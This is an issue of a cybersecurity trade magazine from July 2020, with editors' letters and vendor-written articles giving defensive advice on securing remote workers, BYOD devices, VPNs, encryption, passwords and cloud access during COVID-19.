01.07.2020

Cyber Defense eMagazine July 2020 Edition

Cyber Defense eMagazine July Edition for 2020 #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group as well as Yan Ross, US Editor-in-Chief, Pierluigi Paganini, Co-founder & International Editor-in-Chief, Stevin Miliefsky, President and many more writers, partners and supporters who make this an awesome publication! Thank you all and to our readers! OSINT ROCKS! #CDM #CDMG #OSINT #CYBERSECURITY #INFOSEC #BEST #PRACTICES #TIPS #TECHNIQUES


Security, Convenience & Privacy: A Neverending War

Is the New Normal Workspace Secure?

3 Practices to Avoid Security Risk in A Work from Home World

7 Security Precautions to Protect Remote Workers

…and much more…

Cyber Defense eMagazine July 2020 Edition 1

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


CONTENTS

Welcome to CDM’s July 2020 Issue ------------------------------------------------------------------------------------------------- 7

Security, Convenience & Privacy: A Neverending War------------------------------------------------------------- 24

By Michael Covington, VP of Product Strategy, Wandera

Is the New Normal Workspace Secure? ------------------------------------------------------------------------------- 26

By Simon Townsend, CMO, IGEL

3 Practices to Avoid Security Risk in A Work from Home World ------------------------------------------------ 29

By Akshay Bhargava, Chief Product Officer, Malwarebytes

7 Security Precautions to Protect Remote Workers ---------------------------------------------------------------- 32

By Marty Puranik, President & CEO, Atlantic.Net

The Race to Pivot Around Remote Work and The Emergence Of SASE ---------------------------------------- 36

By Amit Bareket, CEO and Co-Founder of Perimeter 81

Organizations: It’s Time to Rethink How You Protect Environments from Within-------------------------- 39

By Richard Melick, senior technical product manager, Automox

Don’t Be Breached When Using Commercial Software Products ----------------------------------------------- 42

By Randy Reiter CEO of Don’t Be Breached

Is Proactive Insider Risk Mitigation Possible? ------------------------------------------------------------------------ 44

By David A. Sanders, Director of Insider Threat Operations, Haystax

Benefits of A Security Operation Center (SOC) ----------------------------------------------------------------------- 50

By Pedro Tavares, Editor-in-Chief seguranca-informatica.pt

In 2020, SOCs Are Understaffed Yet Overconfident in Ability to Detect Cyberthreats --------------------- 53

By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing manager, Exabeam

Software-Defined Perimeters Offer Secure Connectivity to Smart Cities ------------------------------------- 60

By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com)

Managing Small Business Cybersecurity During Covid-19 -------------------------------------------------------- 63

By Bill DeLisi, CEO of GOFBA



IOT Security Embedded in Memory Cards ----------------------------------------------------------------------------- 66

By Hubertus Grobbel, Vice President Security Solutions, Swissbit.

How To Fight A Virus: Lessons From Cybersecurity ----------------------------------------------------------------- 70

By Yotam Gutman, SentinelOne

How to Combat Cybersecurity Attacks & Cyber Warfare --------------------------------------------------------- 74

By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn

COVID-19 And the Easyjet Hack - A Perfect Phishing Storm ------------------------------------------------------ 78

By Shachar Daniel, Safe-T’s CEO

Should We Be Worried About Vehicle Hacking? -------------------------------------------------------------------- 81

By Martin Banks

Cyber Attacks at Sea: Blinding Warships. ----------------------------------------------------------------------------- 85

By Julien Chesaux, Cyber Security Consultant, Kudelski Security

iPhone Extraction Without A Jailbreak -------------------------------------------------------------------------------------- 92

By Oleg Afonin, Security Researcher, ElcomSoft Co.Ltd.

How to Maintain Anonymity in Communications? ----------------------------------------------------------------- 96

By Milica D. Djekic

Everything You Want to Know About Single Sign-On ------------------------------------------------------------ 100

By Ayman Totounji, Founder, Cynexlink

A Passwordless Future: Will Biometric Identification Replace Passwords? -------------------------------- 106

By Joshua Frisby, Founder of PasswordManagers.co

Post COVID-19: Cloud, Remote Work and BYOD Security Predictions --------------------------------------- 111

By Anurag Kahol, CTO and co-founder, Bitglass

The Rise of COVID-19 Phishing Attacks: How Cyber Adversaries Are Adopting Phishing to Generate New Threat Vectors ------------------------------------------------------------------------------------------------------- 113

By Brad Slavin, CEO of DuoCircle LLC

Post COVID-19: Password Extinction Accelerated; Telemedicine Spurs Fraud ----------------------------- 117

By Robert Prigge, CEO of Jumio



The Future Of Security – Predictions Post COVID-19 ------------------------------------------------------------- 119

By Mike Riemer, Pulse Secure, Global Chief Security Architect

Post COVID-19 Cybersecurity and Future-of-Work Predictions ------------------------------------------------ 121

By DivvyCloud by Rapid7, Chris DeRamus, VP of Technology, Cloud Security Practice

Building A Telework Health Scorecard To Meet Surge Requirements And Long-Term Resiliency ---- 124

By Stan Lowe, Global Chief Information Security Officer, Zscaler

CERT Warns Bad Actors Are Targeting Remote Access – How Security Operations Find And Route These “Below The Radar” Attacks ------------------------------------------------------------------------------------ 128

By Saryu Nayyar, CEO, Gurucul

CRYPTO ---------------------------------------------------------------------------------------------------------------------- 130

By Staford Titus S



@MILIEFSKY

From the Publisher…

New CyberDefenseMagazine.com website, plus updates at CyberDefenseTV.com & CyberDefenseRadio.com

Dear Friends,

Since last month, we’ve seen a continuation and deepening of the effects of COVID-19 on nearly all enterprises which depend on cyberspace for their operations. Both the articles in this month’s magazine and our daily publications, as well as news from nearly all channels, reflect the challenges of maintaining security in an ever-growing dependence on cyber-related systems of all kinds.

At the same time as the “normal” operations of enterprises across the board deal with these issues on a daily basis, one major periodic phenomenon is coming into sharp focus. The election cycle in the United States is upon us, with a mere 4 months until the presidential election. There is little doubt that electronic activities will have a significant effect on the outcome of the election. Already forces from both legitimate and illicit entities are manifesting their influence. From social media to traditional news and commentary outlets, both attackers and defenders appear to be gearing up.

The apparent result of the reopening of various States and municipalities has been described as a resurgence of the first wave of COVID-19 as well as an incipient second wave. Whichever it is, the effects upon widespread operations in the marketplace and the more focused impact on the electoral campaigns are undeniable. We will continue to watch closely and report further developments.

We are pleased to continue providing the powerful combination of monthly eMagazines, daily updates and features on the Cyber Defense Magazine home page, and webinars featuring national and international experts on topics of immediate interest.

Warmest regards,

Gary S. Miliefsky, CISSP®, fmDHS
CEO, Cyber Defense Media Group
Publisher, Cyber Defense Magazine

P.S. When you share a story or an article or information about CDM, please use #CDM and @CyberDefenseMag and @Miliefsky – it helps spread the word about our free resources even more quickly.



@CYBERDEFENSEMAG

CYBER DEFENSE eMAGAZINE

Published monthly by the team at Cyber Defense Media Group and distributed electronically via opt-in Email, HTML, PDF and Online Flipbook formats.

InfoSec Knowledge is Power. We will always strive to provide the latest, most up to date FREE InfoSec information.

From the International Editor-in-Chief…

The international effects of recent medical and political developments continue to show up prominently in the world of cybersecurity. We see a continuation of trends in Coronavirus effects, cyber-criminal activity, and government actions in response to these threats.

International effects of COVID-19 include restrictions on physical travel, resulting in greater dependence on cyber “travel” to accomplish necessary business and government functions. As might be expected, the expanded reliance on cyber assets also provides greater opportunities for criminal activity.

We may also note the divergence in approaches between the European model, using an integrated set of laws and regulations, on one hand, and the U.S. model, which tends to respond to these challenges on a State-by-State basis, on the other. I hasten to add there are some indications of movement on the federal level to adopt national privacy laws which would provide a greater measure of conformity.

As I observed last month, failure to work together in a cooperative fashion can only provide more opportunities for the abuse and misuse of sensitive information, even leading to the compromise of the command and control systems of our critical infrastructure. Accordingly, may I suggest that in the days ahead we agree to put our differences aside in favor of responding to our common enemies: the COVID-19 virus itself and those who would take advantage of this crisis to perpetrate criminal schemes.

To our faithful readers, we thank you,

Pierluigi Paganini
International Editor-in-Chief

PRESIDENT & CO-FOUNDER
Stevin Miliefsky
stevinv@cyberdefensemagazine.com

INTERNATIONAL EDITOR-IN-CHIEF & CO-FOUNDER
Pierluigi Paganini, CEH
Pierluigi.paganini@cyberdefensemagazine.com

US EDITOR-IN-CHIEF
Yan Ross, JD
Yan.Ross@cyberdefensemediagroup.com

ADVERTISING
Marketing Team
marketing@cyberdefensemagazine.com

CONTACT US:
Cyber Defense Magazine
Toll Free: 1-833-844-9468
International: +1-603-280-4451
SKYPE: cyber.defense
http://www.cyberdefensemagazine.com

Copyright © 2020, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (a Steven G. Samuels LLC d/b/a)
276 Fifth Avenue, Suite 704, New York, NY 10001
EIN: 454-18-8465, DUNS# 078358935.
All rights reserved worldwide.

PUBLISHER
Gary S. Miliefsky, CISSP®
Learn more about our founder & publisher at: http://www.cyberdefensemagazine.com/about-our-founder/

8 YEARS OF EXCELLENCE!

Providing free information, best practices, tips and techniques on cybersecurity since 2012, Cyber Defense magazine is your go-to-source for Information Security. We’re a proud division of Cyber Defense Media Group: CYBERDEFENSEMEDIAGROUP.COM

MAGAZINE TV RADIO AWARDS



Welcome to CDM’s July 2020 Issue

From the U.S. Editor-in-Chief

Once again, the July issue of Cyber Defense Magazine brings readers over two dozen articles on cyber and security topics of immediate interest. We are fortunate to rely on a broad spectrum of contributors who share their expertise and insights with our community.

We tend to look for trends and upcoming challenges and responses. For both individual consumers and corporate participants, the establishment of a “value proposition” is the cogent answer to the question “What problem does it solve?”

This month, readers will see elaboration of issues beyond the standard “cybersecurity” problems to solve. For instance, the impact of the broad collection of sensitive personal data in controlling the spread of COVID-19 potentially calls for strong protections of individual privacy. At some point, a balance must be reached between the privacy needs of the individual and the “greater good,” a rhetorical construct which can often lead to unintended adverse consequences.

The migration of workers to a permanent home-based operation appears to require more permanent cybersecurity solutions than just a temporary setup with expectations for workers to return to the more secure environment of HQ.

The age-old saying that “the only constant is change” holds true in these times, as demonstrated by the breadth and depth of the articles we are pleased to bring you this month.

Wishing you all success in your cyber security endeavors,

Yan Ross
US Editor-in-Chief
Cyber Defense Magazine

About the US Editor-in-Chief

Yan Ross, J.D., is a Cybersecurity Journalist & US Editor-in-Chief for Cyber Defense Magazine. He is an accredited author and educator and has provided editorial services for award-winning best-selling books on a variety of topics. He also serves as ICFE's Director of Special Projects, and is the author of the Certified Identity Theft Risk Management Specialist® XV CITRMS® course. As an accredited educator for over 20 years, Yan addresses risk management in the areas of identity theft, privacy, and cyber security for consumers and organizations holding sensitive personal information. You can reach him via his e-mail address at yan.ross@cyberdefensemediagroup.com


Your website could be vulnerable to outside attacks. Wouldn’t you like to know where those vulnerabilities lie? Sign up today for your free trial of WhiteHat Sentinel Dynamic and gain a deep understanding of your web application vulnerabilities, how to prioritize them, and what to do about them. With this trial you will get:

• An evaluation of the security of one of your organization’s websites
• Application security guidance from security engineers in WhiteHat’s Threat Research Center
• Full access to Sentinel’s web-based interface, offering the ability to review and generate reports as well as share findings with internal developers and security management
• A customized review and complimentary final executive and technical report

Click here to sign up at this URL: https://www.whitehatsec.com/info/security-check/

PLEASE NOTE: Trial participation is subject to qualification.


Security, Convenience & Privacy: A Neverending War

By Michael Covington, VP of Product Strategy, Wandera

The veritable “Sophie’s Choice” among security decision-makers has increasingly become the three-way tug-of-war between security, convenience and privacy. With the introduction of the General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA) in 2018, there’s a clear global trend toward prioritizing consumer privacy. However, the COVID-19 pandemic has spurred unprecedented numbers of remote employees, leaving organizations grappling with a novel set of challenges when it comes to security. Yet according to Verizon’s Mobile Security Index 2020 (MSI), organizations continue to sacrifice security, with 52 percent of respondents citing convenience as a top reason to let security take a backseat.

When GDPR took full effect in 2018, it was tangible evidence that people were ready to take more control over their personal data. The terms of GDPR require organizations to ensure that the personal information gathered during normal business transactions remains protected while still respecting the privacy rights of data owners, demonstrating a heightened sense of concern over personal data privacy. The passing of the California Consumer Privacy Act (CCPA) in the same year was further confirmation that consumers were concerned about where and how their personal data was being used, and legislators affirmed they were within their rights to know.

The pressure on organizations to remain transparent while simultaneously protecting the security of their employees and users has therefore been steadily building, leaving business and security leaders at a crossroads. So the question remains: how are organizations to choose between security, convenience, and privacy when it comes to their employees and customers alike?



Industry giants have chosen to approach this ongoing dilemma in different ways. Particularly as it pertains to mobile security, Microsoft has tackled this challenge with the implementation of Mobile Application Management without enrollment (MAM-WE). As work environments become increasingly remote, organizations face an entirely new security landscape that will require them to adapt to BYOD scenarios. MAM-WE gives organizations the ability to manage individual apps to protect sensitive employee data, even on a personal device, in a setting outside the office. Microsoft’s offering is just one example of the ways that companies have broached the issue of security without sacrificing convenience and privacy.

Roughly 24 percent of the full-time U.S. workforce worked remotely for at least a portion of their workweek in pre-pandemic days, but that number is steadily rising as a result of COVID-19. It’s now critical that security decision-makers not overlook the importance of mobile and cloud security in this evolving landscape. Our own analysis shows that as of March 30, the number of connections to collaboration tools like Zoom and Microsoft Teams has increased by 109% since the first week of February.

As Verizon’s Bryan Sartin put it, “The types of devices, diverse applications and further emergence of IoT devices further complicate security. Everyone has to be deliberate and diligent about mobile security to protect themselves and their customers.” This reiterates the sentiment that leaders will have to recognize the inherent risks of increasingly mobile and cloud-connected environments and take proactive action.

There is a way to strike a balance: providing a convenient user experience that also maintains the security and privacy of users. One recommendation would be for organizations to put policies in place that utilize offerings like Wandera Private Access or MAM-WE to ensure that the security of corporate data is not compromised, even when employees use a personal device. Outlining and adopting formal acceptable use policies within organizations will also be a step toward finding this balance.

The findings from recent mobile threat research indicate a trend: decision-makers still believe they have to make a choice between security, convenience, and privacy for their organizations. But with more privacy-preserving and user-friendly security solutions becoming available, a harmonizing middle ground can be found. It’s time to leave the notion that organizations can’t have both in the past, and focus on solutions that allow for the security, convenience and privacy trifecta moving forward.

About the Author

Michael J. Covington, Ph.D., is a seasoned technologist and the Vice President of Product Strategy for Wandera, a leading provider of mobile security. Michael is a hands-on innovator with broad experience across the entire product life cycle, from planning and R&D to executing on company strategies. He previously held leadership roles at Intel Labs, Cisco Security, and Juniper Networks. With a diverse background as a published computer science researcher and as an IT professional, Michael has experienced technology from all sides and enjoys bringing innovations to the market, specifically in the areas of mobility and connectivity. He can be reached at @MJCovington and at https://www.wandera.com/



Is the New Normal Workspace Secure?

Remote working has accelerated the need to better secure endpoints everywhere

By Simon Townsend, CMO, IGEL

Just a few years ago we were predicting Desktop-as-a-Service (DaaS) would soon have its day as enterprises were looking for a way to keep up with the BYOD, multi-device, and user mobility movements. It was time to rethink the ‘desktop’ from a fixed location to a fluid endpoint that could be anywhere – one which could exist as any device, and increasingly be delivered virtually. Fast-forward to today and the COVID-19 crisis, and the need to adopt a more modern approach to managing and securing the endpoint has become painfully clear.

Enterprises have had to pivot overnight to a workforce sheltering in place, with people working remotely on a variety of devices that may or may not have been up to date on security protocols. With evidence mounting that companies like Twitter are endorsing remote work as a regular option going forward, there are a few conclusions: 1) the workspace has to be digital since people are using multiple devices, on site or remotely; 2) endpoint security needs to embrace this new work model and close all security gaps; 3) DaaS and the cloud will become even more important to deliver consistent, secure user experiences; and 4) Virtual Desktop Infrastructure (VDI) continues to be an optimum strategy for maintaining system integrity from endpoints to the data center or cloud.

VDI and DaaS Up to the Task

New pressures on IT teams in response to the evolving COVID-19 recovery are not going to come with bigger budgets or more staff. The increased need to improve security and ensure any asset used remotely is governed correctly via user profiles, associated policies, and access control, all while supporting productivity, is added to the day-to-day IT process challenges businesses face. In a recent survey of IT professionals, Enterprise Strategy Group (ESG) found that, after software licensing, inventory and compliance, the main challenges in delivering a full-featured desktop centered on the pace of change (30%), troubleshooting issues (29%) and operational costs (29%).

VDI and DaaS offer solutions to these IT challenges, with the benefit of maintaining a high level of security without impacting user productivity. As ESG notes, businesses have implemented virtual desktop infrastructure (VDI) and desktop-as-a-service (DaaS) to enable remote employees, but only a small percentage of an employee base made use of this technology. Prior to COVID-19, neither technology had reached high deployment, percentage-wise, within organizations. The ESG survey found 40% of respondents indicated that their organization currently uses VDI technology, while 25% are on the verge of doing so. Similarly, ESG found 39% of respondents reported DaaS usage but planned an increase. Post COVID, ESG’s expectation is that these deployments will rise to accommodate the changing work environment.

Answering the Rise of Security Questions

The new business landscape has sharpened the focus on the digital workspace, to make sure the basics of data security and risk mitigation are handled at the level needed to ensure business continuity. A more remote workforce has shown how essential endpoint management and security are to business survival. Businesses are looking at:

1. Balancing the need for access policy controls with employees’ desire to use more BYOD devices remotely. The ESG survey found a significant disconnect: while 79% of organizations believe VDI and DaaS are more secure than traditional desktop provisioning, 65% of the respondents will have restrictions on the devices used to access VDI or DaaS workspaces. These businesses are not ready to adopt a policy in which employees are allowed to use personal devices. While they perceive VDI or DaaS as superior options, they draw the line at employee-owned devices.

2. Embracing a digital workspace solution like Citrix Workspace to further enable secure remote access. Remote application and desktop delivery and access to web- and cloud-based DaaS apps via a secure browser, paired with secure endpoint management software, will enable employees to access their user profile regardless of location. Whether using the cloud or DaaS, workloads and sensitive data are protected.

3. Maintaining a high level of security without impacting user productivity. The ESG survey found improving employee collaboration to be a top priority in delivering desktop environments, followed closely by detecting security incidents, vulnerabilities, and risk, and managing user expectations of access, device choice, and application preferences. An effective solution is a next-gen, secure Linux OS on endpoints that can be auto-configured based on predefined profiles for simple user access. Device-agnostic, this type of advanced endpoint software can enable organizations to secure all those remote BYOD devices without fear of security risk.



Making the New Normal Environment Safe

IT teams are certainly faced with an unprecedented list of challenges this year. However, the tools to secure the new hybrid environment of more people working remotely fortunately do exist. VDI providers like Citrix are proven options for secure, device-agnostic desktop delivery. DaaS gives organizations another route to deliver applications via the cloud, on demand and securely, enabling business continuity in the case of a disruptive event. Advanced endpoint management software is already in successful deployment, enabling workers to access their user profiles via the cloud, while IT policy controls are executed to support network security.

Regardless of the system chosen, VDI or DaaS, the task is clear: organizations will need to embrace the use of more personal and BYOD devices, coupled with advanced security software to manage the changing work culture.

About the Author

Simon Townsend is global chief marketing officer for IGEL, provider of the next-gen edge OS for cloud workspaces.



3 Practices to Avoid Security Risk in A Work from Home World

By Akshay Bhargava, Chief Product Officer, Malwarebytes

Well before COVID-19 hastened people working from home, users embraced “bring your own device” (BYOD) practices. It created a proliferation of work-connected personal mobile devices that have become a regular part of our workplace fabric. But today, as the workplace has shifted to our homes, employees are now practicing a “use your own device” (UYOD) approach, which means even more personal devices are connecting to company networks.

Like BYOD, UYOD enables employees to be connected to work when they want, and over any device they have on hand – empowering them with the flexibility and access they need to work at home. But one concern still prevails: how to ensure proper security protocols are set and stringently followed in order to provide the same level of security that corporate-owned devices bring.

The COVID-19 phenomenon brings personal endpoint device security concerns, once again, to the forefront. Undoubtedly these personal devices come with a wide range of risk: while some diligent employees may fastidiously follow security protocols, others that don’t take cybersecurity threats as seriously will inadvertently expose their devices to bad actors. This uneven security posture comes at a time when research shows the volume of global threats against business endpoints has increased by 13 percent year-over-year. From an increase in enterprise-focused threats to the diversification of sophisticated hacking and stealth techniques, cybercrime is clearly targeting organizations with increasing vengeance. And working from home on personal devices further elevates this risk.



Improving UYOD Security

While all organizations face increasing risk at the endpoint, small-to-medium sized businesses (SMBs) are particularly vulnerable to a cyberattack. How could they not be when they are operating on thinner margins, with limited IT staff and smaller financial reserves than enterprises? To minimize security risk, SMBs need to put these practices in place when personal devices are being used to access business data:

Embrace a Cultural Security Mindset. One of the obstacles to getting personal device security under control is the mindset that someone else, usually IT, ‘owns’ the cybersecurity and data protection problem. Even though 70 percent of data breaches are known to start at the endpoint, this data point isn’t translating into the average employee’s or contractor’s consciousness.

No matter how strong defenses are, users can introduce threats to a company’s networks by:

• Falling for phishing scams
• Posting sensitive information on social media
• Inadvertently giving away credentials

Employees will more enthusiastically embrace BYOD/UYOD security protocols if management has effectively communicated not only the how behind day-to-day practices to prevent malware or other attacks, but also why mitigating risks is so critical. Acceptable use guidelines might include:

• How to detect social engineering tactics and other scams
• What constitutes acceptable Internet usage
• How remote workers should securely access the office network
• How to properly use password management systems
• How to report security incidents according to their urgency

Encouraging employees to take ownership of their own device security matters all the more because smaller enterprises thrive on being nimble. This ‘get it done now’ mentality can lead to applications being put into play before being thoroughly vetted for access controls, and to a rise in “shadow IT” that may not meet organizational security standards. It can also lead to ‘rogue’ assets: personal devices deployed without full vetting for risk.

The recent wholesale shift to remote working has highlighted this risk more than ever as personal device use explodes. When communicating with employees, there needs to be a careful balance between asking them to be more mindful of security and realizing their first goal is always to get their work done. Communication and education here are essential to individual participation in helping mitigate risk at the endpoint.

Optimize Limited Resources. With limited IT staff, and often no dedicated security staff, SMBs will be looking to guard against the increased security risks from COVID-19 by executing strategic security initiatives for newly remote workers and supporting long-term viability. One critical need in threat defense is endpoint detection and response (EDR) software. EDR is vital to containing a costly breach that could financially devastate an SMB or enterprise. EDR helps security teams contain, investigate and respond to threats that have bypassed other defenses such as antivirus tools. An effective EDR solution provides automated analysis of endpoint telemetry to identify suspicious activity, enabling IT to make a timely decision on the threat level and take quick action accordingly.



Simplifying personal endpoint device protection is also imperative. Managing protection for many devices, given scarce resources, demands centralized management from a single pane of glass to provide real-time protection and on-demand remediation. Many SMBs may also consider outsourcing their security needs to a managed service provider (MSP) in order to free up resources, but this should not take the place of employee security training.

Apply Privacy Protection. As users work from home, they need an extra layer of protection against cyberattack risk, as they are no longer behind the security of your corporate network. This is where the value of a virtual private network (VPN) comes into play. This important, and often overlooked, layer of defense encrypts the user’s traffic between their device and your VPN gateway and hides their home IP address from the services they reach through it, helping to protect your business data in transit.

Serving as a digital middleman between the user and the Internet, a VPN deters eavesdropping and unauthorized tracking on the user’s home or public Wi-Fi network, which helps keep employees from being easy cyberthreat targets. It works like an encrypted tunnel between the user and your data, keeping away the prying eyes of threat actors looking to access your business data in transit, including passwords, personally identifiable information (PII), customer information, credit card numbers and more. By employing a VPN, you can limit the risk of employees working from their personal networks while protecting critical business and customer information. One caveat: a VPN protects the path, not the endpoint. Malware already running on a personal device sees the data before it enters the tunnel, which is why the VPN belongs alongside endpoint protection and EDR rather than in place of them.

Post-COVID Environment

Eventually employees will begin returning to work onsite, but this crisis has demonstrated the benefits of working at home. This means that the heightened use of personal devices for business is here to stay. SMBs can manage this new working reality by improving employee communication on threat prevention, creating a strategy to more thoroughly record and protect assets, and implementing the protection of a VPN to keep important business data away from prying eyes.

In the longer term, all these security measures are going to be critical to economic viability. Cybercriminals have been exploiting COVID-19, but they will revert to other forms of cybercrime soon enough, and ransomware attacks, costly data breaches and business disruption will be back in the news. SMBs can avoid tragedy by implementing strong preventative anti-attack measures now.

About the Author

Akshay Bhargava is the Chief Product Officer at Malwarebytes, a leading provider of advanced endpoint protection and remediation solutions.



7 Security Precautions to Protect Remote Workers

By Marty Puranik, President & CEO, Atlantic.Net

The COVID-19 pandemic has engulfed the world's population, crippled global economies, and changed the way of life for almost every single person in every single country around the world. Nearly six million infection cases have been confirmed. Over two million people have recovered, but over 350,000 deaths have been registered so far, and sadly this figure is expected to grow substantially in the coming days and weeks.

Governments around the world have encouraged employees to work from home wherever possible. Frontline key workers are still required to continue their occupations but, unfortunately, many millions have lost their jobs, and tens of millions have been furloughed on government financial aid.

Currently, there is an enormous workforce engaged and actively working from home, keeping businesses alive in one of the biggest challenges to face a generation. Some reporters are referring to this shift in working behavior as the greatest work-from-home experiment.

With this paradigm shift of working behavior, additional risks and security concerns must be considered to protect organizations from things like wire transfer fraud, ransomware, and exploitation. There is a vast amount of evidence to suggest that cybercriminals are out in force to take advantage of the COVID-19 pandemic.

The most common attack vectors seen in recent weeks are targeted and extensive phishing email campaigns and spoofing using SMS and mobile communications platforms such as WhatsApp.



What can you do to protect your workforce and business from being compromised? We have compiled a list of some of the most effective measures to be undertaken to protect your organization.

Make Sure Your Security Policy Is Valid

The COVID-19 outbreak has highlighted that most organizations’ cybersecurity policies, especially policies regarding mobile computing and teleworking, may be inadequate. Businesses have been scrambling to change the guidelines to adapt to the pandemic. Very few organizations would have had a business continuity strategy that solved all the issues brought about by the seismic shift to home working.

Specific policies to update may revolve around the physical protection of company IT equipment, such as making sure children or relatives do not use company assets, which also helps keep assets in good working condition. If additional technology is needed by the employee, such as extra monitors, keyboards or printers, a formal process should exist to track where company assets are located, for example logging a service desk ticket so that management can approve the removal of company technology from the office. This process greatly improves how assets can be tracked.

Other control measures can be introduced or updated to define the organization's rules and regulations on the usage of laptops, computers, handheld tablets, mobile phones, and digital media, including disks and memory sticks.

Keep Data Protection Relevant

Maintaining data protection is critically important for organizations, even more so when employees are working from home. Organizations are duty-bound by government regulations to uphold data protection. The regulations still apply no matter where the employees are working, be that an office-based role or when working from home.

All laptops should have full-disk encryption enabled, such as Microsoft BitLocker. This protects the data stored on the employee’s physical device: in the event a company device is lost or stolen, the data at rest remains encrypted. Domain policies (Group Policy) can also force remote machines to lock the screen after a few minutes of inactivity.

All portable equipment should require a boot-up password and a domain user account logon when powered up. This may be a firmware (BIOS/UEFI) password or a BitLocker pre-boot PIN, or it might just be the Windows logon screen. Either way, the device must not boot straight into the operating system without prompting for credentials. Note that a logon prompt alone only stops casual access: without disk encryption, anyone who removes the drive can read the data, so the two controls belong together.

Secure Physical Assets

High-value assets must already have the standard security features such as usernames, passwords, and PINs. Extreme care should be taken with mobile computing being used outside of the organization’s premises. In the home environment, extra care should be taken to secure customer and organizational data.

Protection should be in place to avoid unauthorized access to or disclosure of the information stored and processed by the equipment. No other person should be able to access the equipment or view information on the screen, and you should guard against eavesdropping. Do not openly discuss confidential or payment card information where you may be overheard.

Create Strong Passwords

Ensuring a strong and robust password policy might sound like common sense; however, the weakest point of security on a corporate network is the end user. Enforcing system-wide, managed password policies helps to create a hardened perimeter on the network.

Support teams may have to do a little extra work to unlock and reset user accounts if a password is forgotten, but instilling a complex password policy, and a regular, enforced password expiration date, will help give the best protection to the remote workforce. One caveat: current NIST guidance (SP 800-63B) advises against routine periodic expiration and recommends instead changing passwords when there is evidence of compromise and screening new passwords against lists of known-breached ones, so weigh forced rotation against the weak, predictable passwords it tends to produce.

Introducing multi-factor authentication (MFA) for home workers adds extra security for business assets. Using MFA to access cloud storage such as OneDrive, or when accessing Exchange email systems and collaboration tools such as Slack, Teams, or Skype for Business, will add an extra layer of security when out of the office.

Communication and the Training of Homeworkers

Lots of people have worked from home in the past, but for many, COVID-19 has forced employees to use technology and work from home for the first time. For many, this change is extremely difficult to adapt to, not only at a technical level, but in adapting to online meetings and working on your own.

This introduces many security risks. Employees may not remember all the rules of home working. They may use their own device, or they may unintentionally share confidential information on social media.

Clear and concise communication channels from senior management or HR should communicate a consistent message defining what the expectations of the employee are. The messaging should describe how the business intends to function during a lockdown and what the company priorities are.

Combine that with training sessions, online classes, or one-on-one training on how to use collaboration tools and cloud productivity tools, and on how working from home affects access to everyday user applications.

Engaging with employees regularly is a great way to promote wellbeing at work and keep productivity and engagement throughout the business. This benefits morale and, importantly, creates a greater understanding of how to use computer systems securely.



System Updates / Antivirus

Security updates to operating systems and applications have never been more important than during the COVID-19 crisis. System administrators have the responsibility of ensuring that the mobile workforce's information technology is up to date and has the latest security updates.

When an employee's laptop connects to a corporate network, it will typically check in with a centralized administration portal, such as Microsoft System Center Configuration Manager (SCCM). Toolsets like this manage the update schedule of thousands of laptops, computers, and mobile devices over a VPN or standard Internet connection.

Administrators can force updates out on demand to keep antivirus, antimalware, and system updates at the latest level. This creates the best line of defense against malware and ransomware attacks.

Software Protections

The software on the portable equipment must comply with the organizational standards to ensure it is supportable. As mentioned earlier, up-to-date antivirus detection software must be installed to protect local systems. No unauthorized software should be loaded on to company assets, no matter how trivial. Software should not be tampered with to circumvent security measures put in place, such as disabling antivirus system scans.

Any tampering with the software should be considered a disciplinary offense, and the antivirus suite should be configured to audit user behavior. When used to access the Internet, the user’s device should utilize a proxy server where the activity is logged and monitored.

About the Author

Marty Puranik co-founded Atlantic.Net from his dorm room at the University of Florida in 1994. As CEO and President of Atlantic.Net, one of the first Internet Service Providers in America, Marty grew the company from a small ISP to a large regional player, while observing America's regulatory environment limit competition and increase prices on consumers. To keep pace with a changing industry, over the years he has led Atlantic.Net through the acquisition of 16 Internet companies, tripling the company's revenues and establishing customer relationships in more than 100 countries. Providing cutting-edge cloud hosting before the mainstream did, Atlantic.Net has expanded to seven data centers in three countries.



The Race to Pivot Around Remote Work and the Emergence of SASE

By Amit Bareket, CEO and Co-Founder of Perimeter 81

When Kodak completely neglected the rise of digital photography (an idea that Kodak itself invented) and then continued to willfully drive for a revival of technology destined for the dustbin, it became the boilerplate example of what can happen when an organization fails to embrace change, and chooses to fight against the current rather than go with the flow.

Trends and new sources for demand force companies to refresh their business models and pivot around new concepts, or slowly perish. This is happening now in security, where providers still get away with offering singular and traditional solutions like firewalls, antivirus software, and VPNs, but not for long. These products do help to ward off a number of the most common attacks, but converging trends have whipped up industry waves almost reminiscent of those that once toppled the giant of film.

Crowding the Cloud

The adoption of cloud technology among companies has been full steam ahead for the last decade or more, and as it becomes our new normal, the security industry must react with new ways to protect data that’s anywhere and everywhere. For a business, ascension to the cloud has been deliberately slow, a department here, a business flow there, so the tide of this sea change has been gradual.

At least, it was until recently. No one wants to harp on the lessons taught by COVID-19, but here we are. Suddenly, organizations with a desire to exist into the next fiscal year find themselves scrambling to grant access to remote employees, and this has meant the rapid adoption of cloud technologies and the subsequent creation of a host of new issues that security providers must now respond to.

Overloaded networks on traditional architecture experience high latency, and each new employee connecting to the resources they need to work slows down the connection speed of his or her peers. Performance is small potatoes, though. IT teams are more overwhelmed with the number and variety of different devices and unfamiliar sources of traffic, and security leaders are racing to provide a better solution than what was available just last year.

IT Still Catching Up Cloud-Wise

Many cloud services tied into local environments and available to many remote workers (often from personal Wi-Fi connections with dubious security) create gaps where exposure occurs, even due to small issues such as how they’re configured. A business’s resources may be secure, but the wrong box ticked in the admin panel of a cloud-based service is enough to open cracks that need just a bit of pressure to widen into a breach.

Sensitive data is also exchanging more hands faster than ever, during a time when hackers are ramping up their activities to take advantage of the pandemic panic. Under these conditions, orchestrating a stack of traditional security products isn’t enough, even if they can be deployed in a way that secures the network on paper. We don’t live on paper. In reality, the tool sprawl approach creates maintenance issues that the security industry must address alongside classic ideas like threat detection and visibility.

For IT, planning security for in-office infrastructure is simpler, because all employees are always connecting from the same devices, locations, and IP addresses. Very few security “profiles” need to be built, so even with an unwieldy and piecemeal stack of different security tools, smart network access doesn’t need to be scalable. Once network traffic moves from inside the office to outside, however, each remote worker represents a unique threat.

